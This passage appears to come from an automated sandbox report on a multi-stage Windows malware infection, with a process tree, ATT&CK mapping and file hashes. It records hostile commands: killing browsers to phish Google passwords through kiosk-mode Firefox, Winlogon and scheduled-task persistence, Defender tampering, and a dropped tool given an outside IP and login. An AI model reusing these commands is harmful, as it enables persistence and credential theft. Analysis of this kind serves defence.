C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe"C:\Users\Admin\AppData\Local\Temp\10168030101\d1deb9a751.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1588 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1936
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:884
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2612 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.0.753336387\1122620246" -parentBuildID 20221007134813 -prefsHandle 1248 -prefMapHandle 1036 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {af1f3b47-b849-487e-b95a-9c1e79b1e933} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1340 106d2c58 gpu9⤵PID:1896
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.1.623318347\1691582342" -parentBuildID 20221007134813 -prefsHandle 1520 -prefMapHandle 1532 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2de0aa3-f026-4bfb-8040-d9adcf8d925f} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 1548 ebec258 socket9⤵PID:916
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.2.649027204\61099573" -childID 1 -isForBrowser -prefsHandle 2140 -prefMapHandle 2136 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {37d418fd-48cd-4c0c-ba81-2766ff08aee8} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2152 19284d58 tab9⤵PID:608
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.3.606707241\1272150827" -childID 2 -isForBrowser -prefsHandle 2788 -prefMapHandle 2784 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {789a7375-3374-4511-8222-6d1794f02f09} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 2800 1d979458 tab9⤵PID:2924
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.4.978799730\1515863994" -childID 3 -isForBrowser -prefsHandle 3756 -prefMapHandle 3752 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddbd43ab-e94a-4ae1-be66-20bea81e809a} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3768 1ec36b58 tab9⤵PID:972
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.5.523113482\761905324" -childID 4 -isForBrowser -prefsHandle 3888 -prefMapHandle 3892 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5aebc424-cb07-4530-80d0-e3db7a15f950} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 3880 1f7d6158 tab9⤵PID:1700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2612.6.1550244862\1813624862" -childID 5 -isForBrowser -prefsHandle 4044 -prefMapHandle 4048 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 676 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {816de81a-fbbe-452f-bd13-7c079d12d41d} 2612 "\\.\pipe\gecko-crash-server-pipe.2612" 4036 1fa22858 tab9⤵PID:3052
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe"C:\Users\Admin\AppData\Local\Temp\10168040101\9b50395388.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe"C:\Users\Admin\AppData\Local\Temp\10168050101\6z1l5Yn.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3328
-
-
C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"C:\Users\Admin\AppData\Local\Temp\10168070101\8p5Lrev.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4824 -
C:\Users\Admin\AppData\Roaming\4p0OMTuhea.exe"C:\Users\Admin\AppData\Roaming\4p0OMTuhea.exe"8⤵
- Executes dropped EXE
PID:4948
-
-
C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe"C:\Users\Admin\AppData\Roaming\abaMpGYmAU.exe"8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4976 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DiwjvcdgoS.bat"9⤵PID:3876
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:4120
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4128
-
-
C:\Windows\DigitalLocker\it-IT\firefox.exe"C:\Windows\DigitalLocker\it-IT\firefox.exe"10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4528
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe"C:\Users\Admin\AppData\Local\Temp\10168090101\2b06f6fb99.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4368 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 12047⤵
- Loads dropped DLL
- Program crash
PID:4692
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe"C:\Users\Admin\AppData\Local\Temp\10168100101\ed16143bb3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3792 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4924
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe"C:\Users\Admin\AppData\Local\Temp\10168110101\5aba4d79e5.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3828
-
-
C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe"C:\Users\Admin\AppData\Local\Temp\10168120101\ac4788203f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4392
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"C:\Users\Admin\AppData\Local\Temp\10168130101\4022269ebc.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5108 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5108 -s 10168⤵
- Program crash
PID:4220
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 5007⤵
- Loads dropped DLL
- Program crash
PID:1108
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4284 -
C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"7⤵
- Executes dropped EXE
PID:4324
-
-
C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"C:\Users\Admin\AppData\Local\Temp\10168140101\8p5Lrev.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2784 -
C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe"C:\Users\Admin\AppData\Roaming\1j3kLiDowh.exe"8⤵
- Executes dropped EXE
PID:320
-
-
C:\Users\Admin\AppData\Roaming\T9wBxU6hjy.exe"C:\Users\Admin\AppData\Roaming\T9wBxU6hjy.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe"C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4100 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe,"7⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3328 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 78⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4876
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe,"8⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
PID:3268
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 10 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10168150101\6z1l5Yn.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe" && ping 127.0.0.1 -n 10 > nul && "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SSD.exe"7⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4092 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 108⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3560
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 108⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168160101\0uzaP1a.exe"C:\Users\Admin\AppData\Local\Temp\10168160101\0uzaP1a.exe"6⤵
- Executes dropped EXE
PID:4936 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"7⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
PID:3900 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\B892A5C1B94D29B5C3A8FFF4A984794E\64B9C9B9CAF42AE04FA90DF285FF96F6.vbe" /f /rl highest8⤵
- Scheduled Task/Job: Scheduled Task
PID:4728
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /pid 1092 /t8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif"C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf98⤵
- Executes dropped EXE
PID:1548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3944 -
C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10168170101\P2SXMuh.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3572
-
-
-
C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10168180101\iZ73hNr.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 10288⤵
- Program crash
PID:3700
-
-
-
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:824
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:3916
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (4)
  - Windows Service (4)
- Modify Authentication Process (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (4)
  - Windows Service (4)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Defense Evasion
- Impair Defenses (5)
  - Disable or Modify Tools (5)
- Modify Authentication Process (1)
- Modify Registry (9)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (5)
  - Credentials In Files (5)
Discovery
- Browser Information Discovery (1)
- Query Registry (7)
- Remote System Discovery (1)
- System Information Discovery (4)
- System Location Discovery (1)
  - System Language Discovery (1)
- System Network Configuration Discovery (1)
  - Internet Connection Discovery (1)
- Virtualization/Sandbox Evasion (2)
Downloads
Filesize11.8MB
MD533bf7b0439480effb9fb212efce87b13
SHA1cee50f2745edc6dc291887b6075ca64d716f495a
SHA2568ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig
Filesize1KB
MD5937326fead5fd401f6cca9118bd9ade9
SHA14526a57d4ae14ed29b37632c72aef3c408189d91
SHA25668a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2
-
Filesize
7KB
MD5aaf5c83bce7bbbf3a9ed4aa0d03efaf5
SHA14c8952135132981739df5b7c2d6480e3d7d43205
SHA25666efdd7ec3fa7bb252fb2e0ce9ce0515cb45dc883cb08df2993640b2e0f47876
SHA5125ae1c0bd932dc14aca7812f8acb6bee07e54f585f3b7fc381db63c3f385d9ecdde710d7ea0e64b341d76c80fd18b266f482e5e39a7434e1cc290a344e5d6dcbe
-
Filesize
6KB
MD5f3e0243e794aff442ce61ceef100a1bf
SHA16910ed8bd903193fce4402c98b6fcde78f2b7d33
SHA256e08206111f17853ceba18945e09e190f4f22ca4c899aa21489d725c1bf399ea2
SHA5129e5baa0f6d057ced61565eeb46ab2d78ebf16b04d47e241ee696c800324ef6a993784544890a6292f18724dde4da62d0373e35ecb78fd812135d7dd92f1414e1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5755a812a94fcb2923b363fcc39e27f52
SHA1e9100c4b39b724ad9c25535518e410d00ff65e77
SHA256759d5c026a67ec00f10bbd75df859fc0874867d0a89f19caacbbb045ee52a009
SHA51269f4c15f44e594101632ae32ec3f12064eed3883a8bcd2eaa3dffa0c6a141f8d533c32cd32a032c87bcea3a88b56471754195447fdf1a9b90b22a60c63c2bdd7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n3lsnn48.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD5bece0acf9d7f19d01c7943c54d2ad372
SHA1aef59ca4b0fe97f32db128e103bfb98aee3b5e29
SHA256ce40f79585195148ac86928d18da80b963cc98d6feb83c1c2e75e8b6d6ef39f8
SHA512105fb01521fca054766d1d1e46cf3bf177b8bab44800f7bbad9a84f388af32e745474b3cc4f70c1fd779b4e7bcf0912502860092e1824f7ba4b52c612ba5a70b
-
Filesize
526KB
MD58ff8554b369f49ab17c0c588dccc7c41
SHA1701061a9a9ed8674587bfc51d8bcbf9ebf893c1b
SHA256ac0655d5bccf2669297a08564c1c98f428bbda7e5a4d7bb5215fef06b23e9881
SHA5128380c30f664b4c28334db1d315dbb62ef4bdc6a190c29d0f79eb2e2baed5bc8f5c3ff0c5ea3421026b97c58dd53144e684d124118edba456d11e1368b54b036a
-
Filesize
1.8MB
MD509e83a87eb8606e9f84a6a78349a615a
SHA1d294d80666e04fb6229ed8c0d849ccce2ebbf881
SHA256dc274be4181801a3b27036514f89ca8afc964930ba57afc5f99e86b4deff4b79
SHA512b1d6bb5e1e7ec84afe40d41ed0df31e2b0d74167d784581513a3bcbc7943742bd4ef9706bf2f691315ecfb57a1475d21077ebbc5eff9d1c5f29f6475b5dd717c
-
\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif
Filesize1.3MB
MD508cff083585794c9ce26585faa7c8df4
SHA1c9aed53641e8f36e9a590af5c62ba434f9d4203a
SHA2569d61713812b8af616f33f88f5fb8ba98bbdef9ab5e33229d402a4ba4e6974e97
SHA512f76cbd115ebec6b00fe04bc2029d33552bfda7d4f909543e37787804f2279cc3f8f5234215192c1a74102a772a9806a0fccc7a05b4e1aeec7ddacd7c084c85ba